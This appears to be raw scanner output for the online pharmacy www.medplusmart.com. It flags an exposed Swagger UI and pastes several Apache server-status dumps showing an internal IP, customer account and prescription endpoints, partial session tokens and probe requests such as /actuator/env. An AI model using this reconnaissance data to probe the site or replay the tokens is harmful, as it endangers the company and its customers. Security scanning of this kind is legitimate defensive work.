AkamaiGHost
tcp/443
Apache
tcp/443
Exposing Swagger/OpenAPI documentation is primarily a risk if your API has underlying security flaws, as it gives attackers a precise roadmap to find them.
Those detail every endpoint, parameter, and data model, making it easier to discover and exploit vulnerabilities like broken access control or injection points.
While a perfectly secure API mitigates the danger, protecting your documentation is a critical layer of defense that forces attackers to work without a map.
Severity: info
Fingerprint: 5733ddf49ff49cd1aad035491a2a4a617b66d72ae60cc2f9b389e93fb389e93f
Public Swagger UI/API detected at path: /swagger/index.html - sample paths: GET /Version-spa GET /healthcheck GET /logger GET /settings
Exposing Swagger/OpenAPI documentation is primarily a risk if your API has underlying security flaws, as it gives attackers a precise roadmap to find them.
Those detail every endpoint, parameter, and data model, making it easier to discover and exploit vulnerabilities like broken access control or injection points.
While a perfectly secure API mitigates the danger, protecting your documentation is a critical layer of defense that forces attackers to work without a map.
Severity: info
Fingerprint: 5733ddf49ff49cd1aad035491a2a4a617b66d72ae60cc2f9b389e93fb389e93f
Public Swagger UI/API detected at path: /swagger/index.html - sample paths: GET /Version-spa GET /healthcheck GET /logger GET /settings
Exposing Swagger/OpenAPI documentation is primarily a risk if your API has underlying security flaws, as it gives attackers a precise roadmap to find them.
Those detail every endpoint, parameter, and data model, making it easier to discover and exploit vulnerabilities like broken access control or injection points.
While a perfectly secure API mitigates the danger, protecting your documentation is a critical layer of defense that forces attackers to work without a map.
Severity: info
Fingerprint: 5733ddf49ff49cd1aad035491a2a4a617b66d72ae60cc2f9b389e93fb389e93f
Public Swagger UI/API detected at path: /swagger/index.html - sample paths: GET /Version-spa GET /healthcheck GET /logger GET /settings
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b77ba0ceb77ba0ce0bcac250
Apache Status Apache Server Status for www.medplusmart.com (via 172.25.0.56) Server Version: Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 Server MPM: event Server Built: 2024-07-17T18:55:23 Current Time: Tuesday, 11-Nov-2025 04:37:34 IST Restart Time: Monday, 13-Oct-2025 20:18:02 IST Parent Server Config. Generation: 33 Parent Server MPM Generation: 32 Server uptime: 28 days 8 hours 19 minutes 31 seconds Server load: 0.01 0.02 0.00 Total accesses: 159084641 - Total Traffic: 847.8 GB - Total Duration: 26222414048 CPU Usage: u41.58 s76.15 cu116164 cs58806.7 - 7.15% CPU load 65 requests/sec - 363.0 kB/second - 5.6 kB/request - 164.833 ms/request 2 requests currently being processed, 0 workers gracefully restarting, 98 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 11698244no9yes0050071 21698121no15yes20480132 Sum2024 20980203 ..................................................______________ ______________________________________________W_________________ __________________W___.......................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32-0/0/752195. 0.007761321189842950.00.004117.91 2.18.254.180http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=MIRB000 0-32-0/0/752770. 0.007761211168257850.00.004113.28 95.101.181.71http/1.1www.medplusmart.com:443POST /mart-common-api/generateToken HTTP/1.1 0-32-0/0/752141. 0.00776451196637420.00.004017.81 2.18.254.180http/1.1www.medplusmart.com:443GET /product/vanish-oxi-action-180ml-liquid_vani0035 HTTP/1.1 0-32-0/0/751733. 0.00776451228255570.00.004067.20 2.18.254.180http/1.1www.medplusmart.com:443GET /product/ring-guard-cream-12gm_ring0004 HTTP/1.1 0-32-0/0/752954. 0.007762261186482360.00.004156.88 2.18.254.180http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getCompleteProductInformation HT 0-32-0/0/753004. 0.007761241165672020.00.004107.01 23.11.215.79http/1.1www.medplusmart.com:443POST /mart-common-api/generateToken HTTP/1.1 0-32-0/0/753067. 0.00776521155064310.00.004142.18 2.18.254.180http/1.1www.medplusmart.com:443GET /product/zintovin-6mg-tab_zint0011 HTTP/1.1 0-32-0/0/752617. 0.007767471229645780.00.004152.52 23.11.215.79http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearchResults?searchCriteria=%7 0-32-0/0/750524. 0.00776381318656760.00.004095.73 2.18.254.180http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-32-0/0/752966. 0.00776941193615710.00.004184.17 2.18.254.180http/1.1www.medplusmart.com:443GET /mart-catalog-api/getDynamicFooter?tokenId=FD83B3C506BC7C65 0-32-0/0/751175. 0.007767951173756930.00.004119.08 23.11.215.79http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearchResults?searchCriteria=%7 0-32-0/0/752349. 0.007766271152509000.00.004153.65 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-common-api/setLocality?locationInfo=%7B%22pinCode%22: 0-32-0/0/752278. 0.0077691164166990.00.004119.17 23.65.124.43http/1.1www.medplusmart.com:443GET /mart-common-api/getOrderCancellationReasons?orderType=P&to 0-32-0/0/751724. 0.00776501150112360.00.004120.73 2.18.254.180http/1.1www.medplusmart.com:443GET /product/levodin-oz-tab_levo0675 HTTP/1.1 0-32-0/0/751278. 0.00776171222118720.00.004145.60 23.62.101.22http/1.1www.medplusmart.com:443GET /mart-common-api/getLocalityAutoSuggestions?localitySearchS 0-32-0/0/752967. 0.00776411263055730.00.004140.46 23.203.63.47http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-32-0/0/752766. 0.0077671143377210.00.004156.97 2.18.254.180http/1.1www.medplusmart.com:443GET /doctors-api/getDoctorsCategories?doctorLatLongVersionKey=& 0-32-0/0/751022. 0.007761131160094520.00.004132.36 2.18.254.180http/1.1www.medplusmart.com:443POST /mart-common-api/generateToken HTTP/1.1 0-32-0/0/751802. 0.00776601144162170.00.004147.02 2.18.254.180http/1.1www.medplusmart.com:443GET /mart-catalog-api/product/getTotalSaleCount?productId=RELI0 0-32-0/0/752170. 0.0077661153182220.00.004112.45 2.18.254.180http/1.1www.medplusmart.com:443GET /mart-common-api/getVersionKeys?tokenId=&timeStapm=2025-11- 0-32-0/0/751883. 0.0077610841153035720.00.004154.00 2.18.254.180http/1.1www.medplusmart.com:443POST /mart-common-api/generateToken HTTP/1.1 0-32-0/0/752316. 0.007761171141908270.00.004115.54 2.18.254.180http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=79F94450A022AD 0-32-0/0/751296. 0.00776201140242480.00.004097.46 23.62.101.22http/1.1www.medplusmart.com:443GET /mart-common-api/getLocalityAutoSuggestions?localitySearchS 0-32-0/0/751423. 0.00776121217092430.00.004126.61 2.18.254.180http/1.1www.medplusmart.com:443GET /labcatalog/getDiagnosticsCategories?labCatalogVersionNoKey 0-32-0/0/751715. 0.0077601159516570.00.004138.06 23.203.63.38http/1.1www.medplusmart.com:443GET /offline.html HTTP/1.1 0-32-0/0/750603. 0.007761391172613960.00.004120.85 2.18.254.180http/1.1www.medplusmart.com:443GET /categories/personal-care_10102/eyes-ears-n-lips_20009 HTTP 0-32-0/0/750796. 0.007768051176997990.00.004136.98 2.18.254.180http/1.1www.medplusmart.com:443GET /manufacturer/service-worker.js HTTP/1.1 0-32-0/0/751546. 0.007761201151544510.00.004082.17 23.11.215.79http/1.1www.medplusmart.com:443POST /mart-common-api/generateToken HTTP/1.1 0-32-0/0/751817. 0.0077661221683780.00.004099.40 95.101.181.71http/1.1www.medplusmart.com:443GET /mart-common-api/getVersionKeys?tokenId=&timeStapm=2025-11- 0-32-0/0/750422. 0.007761081170093400.00.004110.61 95.101.181.71http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=60A4859753D4F2 0-32-0/0/749969. 0.007761191331793420.00.004070.26 95.101.181.71http/1.1www.medplusmart.com:443POST /mart-common-api/generateToken HTTP/1.1 0-32-0/0/750151. 0.007762871215807990.00.004084.47 2.18.254.180http/1.1www.medplusmart.com:443GET /product/a%25252dto%25252dz%25252dgold%25252dtablet_a_to000 0-32-0/0/749628. 0.007761011163982480.00.004109.86 2.18.254.180http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=43FE4AD7349826 0-32-0/0/750117. 0.0077671469906980.00.004115.05 2.18.254.180http/1.1www.medplusmart.com:443GET /mart-common-api/getVersionKeys?tokenId=&timeStapm=2025-11- 0-32-0/0/750542. 0.00776251144768010.00.004052.74 2.18.254.180http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-32-0/0/749571. 0.0077671195470930.00.004125.19 95.101.181.71http/1.1www.medplusmart.com:443GET /doctors-api/getDoctorsCategories?doctorLatLongVersionKey=& 0-32-0/0/750529. 0.00776191239964630.00.004079.58 23.62.101.38http/1.1www.medplusmart.com:443GET /mart-common-api/getLocalityAutoSuggestions?localitySearchS 0-32-0/0/749303. 0.00776391231927780.00.004125.97 95.101.181.71http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-32-0/0/750091. 0.007761181158408440.00.004039.74 2.18.2
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b77ba0ceb77ba0ce90f5a1aa
Apache Status Apache Server Status for www.medplusmart.com (via 172.25.0.56) Server Version: Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 Server MPM: event Server Built: 2024-07-17T18:55:23 Current Time: Sunday, 09-Nov-2025 02:42:56 IST Restart Time: Monday, 13-Oct-2025 20:18:02 IST Parent Server Config. Generation: 31 Parent Server MPM Generation: 30 Server uptime: 26 days 6 hours 24 minutes 53 seconds Server load: 0.03 0.01 0.00 Total accesses: 147085889 - Total Traffic: 786.1 GB - Total Duration: 24361899264 CPU Usage: u29.41 s66.03 cu107542 cs54438.3 - 7.14% CPU load 64.8 requests/sec - 363.2 kB/second - 5.6 kB/request - 165.63 ms/request 3 requests currently being processed, 0 workers gracefully restarting, 97 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 01514263no19yes10490151 21514160no10yes2048071 Sum2029 30970222 ______________________W___________________________.............. ....................................____________________________ ___W_______W__________.......................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3015142630/42/702921_ 2.3911281120505200.00.263862.96 23.62.101.38http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=NATU003 0-3015142630/39/703830_ 2.410391093095300.00.213850.34 95.101.181.71http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-3015142630/38/703029_ 2.42071076671170.00.233762.08 95.101.181.71http/1.1www.medplusmart.com:443GET /mart-common-api/getVersionKeys?tokenId=A50C317101B1F72A995 0-3015142630/39/702684_ 2.41091107457020.00.203804.90 2.18.254.180http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getRecommendedProducts HTTP/1.1 0-3015142630/33/703899_ 2.410551111934360.00.183895.83 2.18.254.180http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-3015142630/44/703773_ 2.35101089446440.00.243848.58 95.101.181.71http/1.1www.medplusmart.com:443GET /swagger.json HTTP/1.1 0-3015142630/36/703991_ 2.3811291082855510.00.163875.45 2.18.254.180http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=DIAB002 0-3015142630/37/703616_ 2.410531157066680.00.163896.24 2.18.254.180http/1.1www.medplusmart.com:443GET /product/sternon-s-32ml-lotion_ster0004 HTTP/1.1 0-3015142630/39/701852_ 2.410451242971470.00.243842.92 95.101.181.71http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getCompleteProductInformation HT 0-3015142630/37/703923_ 2.37291121658540.00.213917.94 2.18.254.180http/1.1www.medplusmart.com:443GET /mart-catalog-api/getDynamicFooter?tokenId=52325A318AE983DB 0-3015142630/44/702314_ 2.351441100785450.00.303847.77 2.18.254.180http/1.1www.medplusmart.com:443GET /product/udapa-m-10-500-xr-tab_udap0003 HTTP/1.1 0-3015142630/41/703521_ 2.391311077176980.00.223908.78 23.62.101.38http/1.1www.medplusmart.com:443GET /mart-catalog-api/product/getTotalSaleCount?productId=NATU0 0-3015142630/43/703257_ 2.38131080144360.00.243861.97 95.101.181.71http/1.1www.medplusmart.com:443GET /@vite/env HTTP/1.1 0-3015142630/43/702807_ 2.381461079259970.00.173854.23 2.18.254.180http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getCompleteProductInformation HT 0-3015142630/38/702463_ 2.350521140750480.00.193888.99 95.101.181.71http/1.1www.medplusmart.com:443GET /product/zeronac-r-cap_zero0082 HTTP/1.1 0-3015142630/38/704144_ 2.381381189679520.00.153881.84 95.101.181.71http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-3015142630/35/703759_ 2.3912411073656460.00.263890.96 23.203.63.38http/1.1www.medplusmart.com:443GET /mart-checkout/getCartInfo?useComplimentary=true&tokenId=6D 0-3015142630/33/702066_ 2.3811261087624570.00.173870.08 23.11.215.79http/1.1www.medplusmart.com:443POST /mart-common-api/generateToken HTTP/1.1 0-3015142630/40/702657_ 2.4103251074401780.00.283883.66 95.101.181.71http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getCompleteProductInformation HT 0-3015142630/38/703053_ 2.38191081094600.00.183843.91 95.101.181.71http/1.1www.medplusmart.com:443GET /mart-catalog-api/getDynamicFooter?tokenId=E51304D618F64C7E 0-3015142630/38/703062_ 2.362701080905340.00.183883.12 23.203.63.47http/1.1www.medplusmart.com:443GET /my-profile/getNotifications?tokenId=CBF7E1506CEE8A63C88D83 0-3015142630/39/703256_ 2.381121071115630.00.163849.37 23.62.101.22http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-30151426317/42/702493W 2.32001066580980.00.233830.02 2.18.254.180http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=FORM002 0-3015142630/34/702478_ 2.3912311141327770.00.213875.30 95.101.181.71http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getCompleteProductInformation HT 0-3015142630/39/702682_ 2.3912241088188740.00.213869.19 104.124.54.78http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getCompleteProductInformation HT 0-3015142630/40/701546_ 2.41041100120920.00.253854.48 95.101.181.71http/1.1www.medplusmart.com:443GET /about HTTP/1.1 0-3015142630/41/701655_ 2.4101391105289440.00.203878.53 23.203.63.38http/1.1www.medplusmart.com:443POST /doctors-api/checkout/getPatients HTTP/1.1 0-3015142630/43/702446_ 2.39171081431260.00.243837.30 2.18.254.180http/1.1www.medplusmart.com:443GET /doctors-api/getDoctorsCategories?doctorLatLongVersionKey=1 0-3015142630/41/702809_ 2.391371150720690.00.223843.04 23.62.101.38http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getSimilarProducts HTTP/1.1 0-3015142630/40/701436_ 2.24021099322850.00.243846.07 2.18.254.180http/1.1www.medplusmart.com:443GET /manifest.json HTTP/1.1 0-3015142630/37/701167_ 2.3621741103522020.00.273810.77 95.101.181.71http/1.1www.medplusmart.com:443GET /product/match-2ml-injection_MATC0001 HTTP/1.1 0-3015142630/40/701190_ 2.391241146034770.00.223820.24 23.62.101.22http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getRecentViewedProducts HTTP/1.1 0-3015142630/36/700562_ 2.381121094894500.00.213848.75 95.101.181.71http/1.1www.medplusmart.com:443GET /labcatalog/getDiagnosticsCategories?labCatalogVersionNoKey 0-3015142630/36/701186_ 2.38141399508000.00.133852.32 95.101.181.71http/1.1www.medplusmart.com:443GET /actuator/env HTTP/1.1 0-3015142630/40/701241_ 2.3501451075902010.00.233801.32 2.18.254.180http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=FORA000 0-3015142630/41/700903_ 2.410451121622980.00.233870.44 95.101.181.71http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getCompleteProductInformation HT 0-3015142630/33/701703_ 2.36221167741180.00.193841.12 95.101.181.71http/1.1www.medplusmart.com:443GET /manifest.json HTTP/1.1 0-3015142630/43/700224_ 2.37201131057640.00.293865.92 95.101.181.71http/1.1www.medplusmart.com:443GET /api-docs/swagger.json HTTP/1.1 0-3015142630/41/701324_ 2.420671086426400.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b77ba0ceb77ba0ce1f8a4540
Apache Status Apache Server Status for www.medplusmart.com (via 172.25.0.56) Server Version: Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 Server MPM: event Server Built: 2024-07-17T18:55:23 Current Time: Friday, 07-Nov-2025 13:47:36 IST Restart Time: Monday, 13-Oct-2025 20:18:02 IST Parent Server Config. Generation: 29 Parent Server MPM Generation: 28 Server uptime: 24 days 17 hours 29 minutes 34 seconds Server load: 0.08 0.07 0.02 Total accesses: 137305149 - Total Traffic: 734.7 GB - Total Duration: 22792270073 CPU Usage: u51.67 s74.14 cu100179 cs50697.3 - 7.07% CPU load 64.3 requests/sec - 360.6 kB/second - 5.6 kB/request - 165.997 ms/request 6 requests currently being processed, 0 workers gracefully restarting, 94 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 01370211no27yes30470241 11367006yes2no000000 21367164yes1no000000 31370339yes1no000000 41370442no38yes30470321 61370549yes1no000000 Sum6470 60940562 ______________W___________W_______W_______________.............. ........................G....................................... .....................G..............G........................... ........_______________WW______________W__________________...... .....................................................G.......... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2813702110/151/654521_ 8.2601031052365570.00.513599.22 23.203.63.54http/1.1www.medplusmart.com:443POST /my-profile/getCustomerOrderHistory HTTP/1.1 0-2813702110/147/655631_ 8.310561019544400.00.493587.48 23.203.63.38http/1.1www.medplusmart.com:443GET /mart-catalog-api/product/getProductAvailableNearByStores?p 0-2813702110/144/655077_ 8.271921003911060.00.553508.02 23.203.63.54http/1.1www.medplusmart.com:443GET /labcatalog/get-separator-banners?REQUEST_OBJ=%7B%22request 0-2813702110/160/654786_ 8.300171031601550.00.613541.53 23.203.63.54http/1.1www.medplusmart.com:443GET /my-profile/getCustomerDetails?reqFromMyAccount=true&loginT 0-2813702110/145/655926_ 8.310741038832570.02.033637.14 95.101.181.71http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-2813702110/150/655556_ 8.28191018419760.00.563594.72 95.101.181.71http/1.1www.medplusmart.com:443GET /debug/default/view?panel=config HTTP/1.1 0-2813702110/146/655635_ 8.281131014749990.00.583603.24 23.11.215.13http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-2813702110/142/655608_ 8.291491086453880.01.643616.27 95.101.181.71http/1.1www.medplusmart.com:443GET /product/candirap-10gm-cream_cand0131 HTTP/1.1 0-2813702110/143/653806_ 8.281171171744530.00.513584.16 23.11.215.79http/1.1www.medplusmart.com:443GET /medplusSubscription/secure/getMdxPointsTransactionHistoryD 0-2813702110/153/655905_ 8.291191050139780.00.703656.68 23.65.124.43http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=F98EE2470D658D 0-2813702110/156/654108_ 8.2814391032844760.01.513585.29 23.203.63.54http/1.1www.medplusmart.com:443GET /my-profile/getOrderForCustomerReview?tokenId=504B521BBAAB3 0-2813702110/151/655596_ 8.261671004040130.00.583646.81 23.203.63.38http/1.1www.medplusmart.com:443GET /my-profile/getNotifications?tokenId=504B521BBAAB31D391A092 0-2813702110/142/655011_ 8.300141011107020.01.443608.63 23.203.63.38http/1.1www.medplusmart.com:443GET /labcatalog/get-top-level-categories?tokenId=03E94033794684 0-2813702110/149/654696_ 8.310171008837940.00.533594.50 23.203.63.54http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-2813702112/145/654597W 8.26001067902440.00.583638.39 23.11.215.13http/1.1www.medplusmart.com:443GET /mart-common-api/setLocality?locationInfo=%7B%22pinCode%22: 0-2813702110/152/655856_ 8.290151118409310.00.593601.00 104.124.54.21http/1.1www.medplusmart.com:443POST /my-profile/getPrescriptionDetails HTTP/1.1 0-2813702110/145/655566_ 8.291225994740060.00.583621.69 104.124.54.21http/1.1www.medplusmart.com:443POST /my-profile/getOrderItems HTTP/1.1 0-2813702110/149/654004_ 8.261581014005840.00.543614.61 23.65.124.75http/1.1www.medplusmart.com:443POST /labOrderHistory/getLabOrderDetails HTTP/1.1 0-2813702110/143/654844_ 8.310127999636800.00.563611.00 95.101.181.71http/1.1www.medplusmart.com:443POST /mart-common-api/generateToken HTTP/1.1 0-2813702110/146/654857_ 8.290851010581520.00.613577.91 23.65.124.75http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-2813702110/147/654820_ 8.291201005539990.00.533606.80 23.65.124.75http/1.1www.medplusmart.com:443GET /my-profile/getCustomerDetails?reqFromMyAccount=true&loginT 0-2813702110/144/655063_ 8.29012999322040.00.503582.51 23.65.124.75http/1.1www.medplusmart.com:443GET /medplusSubscription/secure/getMdxPointsTransactionHistoryD 0-2813702110/149/654470_ 8.28170992959600.01.853561.48 23.203.63.38http/1.1www.medplusmart.com:443GET /mart-catalog-api/getDynamicSectionProducts?tokenId=504B521 0-2813702110/147/654427_ 8.2401121068933460.00.593616.11 23.11.215.79http/1.1www.medplusmart.com:443GET /mart-checkout/getPickStoreDetails?tokenId=592AE99A4776CCE4 0-2813702110/144/654954_ 8.2812931015064880.00.563624.03 23.65.124.43http/1.1www.medplusmart.com:443POST /my-profile/getCustomerOrderHistory HTTP/1.1 0-2813702110/146/653609_ 8.271121026751590.00.513597.94 23.203.63.38http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=504B521BBAAB31 0-2813702115/145/653641W 8.26001035177300.03.343604.31 95.101.181.71http/1.1www.medplusmart.com:443GET /server-status HTTP/1.1 0-2813702110/145/654272_ 8.28161012127270.00.563583.50 104.124.54.78http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-2813702110/148/654985_ 8.31071001746300.02.193593.34 95.101.181.71http/1.1www.medplusmart.com:443GET /mart-common-api/getVersionKeys?tokenId=&timeStapm=2025-11- 0-2813702110/145/653578_ 8.300241016110600.00.593571.15 23.203.63.54http/1.1www.medplusmart.com:443GET /my-profile/getCustomerDetails?reqFromMyAccount=true&loginT 0-2813702110/139/653492_ 8.310241026247890.00.563557.34 23.203.63.38http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getRecommendedProducts HTTP/1.1 0-2813702110/143/653183_ 8.28181072141970.00.553543.25 104.124.54.21http/1.1www.medplusmart.com:443GET /mart-catalog-api/getPopularBrands?tokenId=AB58F79504EC8947 0-2813702110/151/652643_ 8.2812861022285560.00.593582.22 23.203.63.38http/1.1www.medplusmart.com:443GET /my-profile/getHomeTrackOrderStatusInfo?tokenId=504B521BBAA 0-2813702110/146/653209_ 8.261101322018540.00.553599.53 23.203.63.38http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-2813702118/140/653480W 8.26001002089700.00.553544.34 95.101.181.71http/1.1www.medplusmart.com:443GET /product/BIGCAL-TAB_BIGC0008 HTTP/1.1 0-2813702110/143/653228_ 8.250671047354880.00.603607.18 23.203.63.54http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-281370211
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b77ba0ceb77ba0ce1ece1cd4
Apache Status Apache Server Status for www.medplusmart.com (via 172.25.0.56) Server Version: Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 Server MPM: event Server Built: 2024-07-17T18:55:23 Current Time: Wednesday, 05-Nov-2025 19:30:57 IST Restart Time: Monday, 13-Oct-2025 20:18:02 IST Parent Server Config. Generation: 27 Parent Server MPM Generation: 26 Server uptime: 22 days 23 hours 12 minutes 54 seconds Server load: 0.14 0.06 0.06 Total accesses: 127264677 - Total Traffic: 683.6 GB - Total Duration: 21167305166 CPU Usage: u41.51 s66.09 cu92988.3 cs47026.7 - 7.06% CPU load 64.1 requests/sec - 361.2 kB/second - 5.6 kB/request - 166.325 ms/request 15 requests currently being processed, 0 workers gracefully restarting, 135 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 01216943no27yes30470230 31214640yes1no000000 41216687no51yes80420411 51216810no40yes40460350 Sum41119 1501350991 __________________W__W_________W__________________.............. ................................................................ ................................................................ .....G..______WW___________________W_W___WWW____W_______________ __________________W__W______W______________W.................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2612169430/5/601218_ 0.21083974382150.00.013328.25 23.61.0.82http/1.1www.medplusmart.com:443POST /doctors-api/checkout/getPatients HTTP/1.1 0-2612169430/5/602258_ 0.1917940662650.00.023310.40 23.57.76.48http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-2612169430/5/601713_ 0.1919924863150.00.013248.33 95.101.181.71http/1.1www.medplusmart.com:443GET /labcatalog/getDiagnosticsCategories?labCatalogVersionNoKey 0-2612169430/5/601434_ 0.1919951610970.00.013266.81 23.57.76.48http/1.1www.medplusmart.com:443GET /mart-catalog-api/getQuickOfferBanners?tokenId=F6FF9622C53C 0-2612169430/5/602735_ 0.191199956250270.00.023337.80 23.57.76.48http/1.1www.medplusmart.com:443GET /my-profile/getRetryPaymentInfoForCustomer?tokenId=F6FF9622 0-2612169430/5/602368_ 0.1917936113210.00.023309.55 23.203.63.38http/1.1www.medplusmart.com:443GET /mart-catalog-api/getQuickOfferBanners?tokenId=EB559C6989A6 0-2612169430/4/602302_ 0.1918936022320.00.013333.69 23.203.63.38http/1.1www.medplusmart.com:443GET /my-profile/getPromotionTemplateDetails?tokenId=EB559C6989A 0-2612169430/5/602619_ 0.2015998568540.00.023330.71 23.11.215.79http/1.1www.medplusmart.com:443GET /mart-catalog-api/getPopularBrands?tokenId=B611DE4E096008BD 0-2612169430/4/600958_ 0.191101067772760.00.013308.53 23.57.76.28http/1.1www.medplusmart.com:443GET /my-profile/getPromotionTemplateDetails?tokenId=F6FF9622C53 0-2612169430/4/602532_ 0.1913967330970.00.013367.89 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-common-api/checkAppUpdate?phoneVersion=13&minSdkVersi 0-2612169430/5/600839_ 0.201131953723080.00.023322.57 23.11.215.85http/1.1www.medplusmart.com:443GET /my-profile/getImageServerDetail?tokenId=4BE15F2E37E62F2366 0-2612169430/5/602294_ 0.22062923663240.00.023363.74 23.203.63.38http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-2612169430/4/602113_ 0.2016926986920.00.013342.57 23.11.215.79http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-2612169430/5/601290_ 0.20110929073860.00.023321.51 23.11.215.79http/1.1www.medplusmart.com:443GET /doctors-api/getUpcomingConsultations?tokenId=3E16784B0D720 0-2612169430/5/601241_ 0.210272987238160.00.053373.54 23.212.50.121http/1.1www.medplusmart.com:443POST 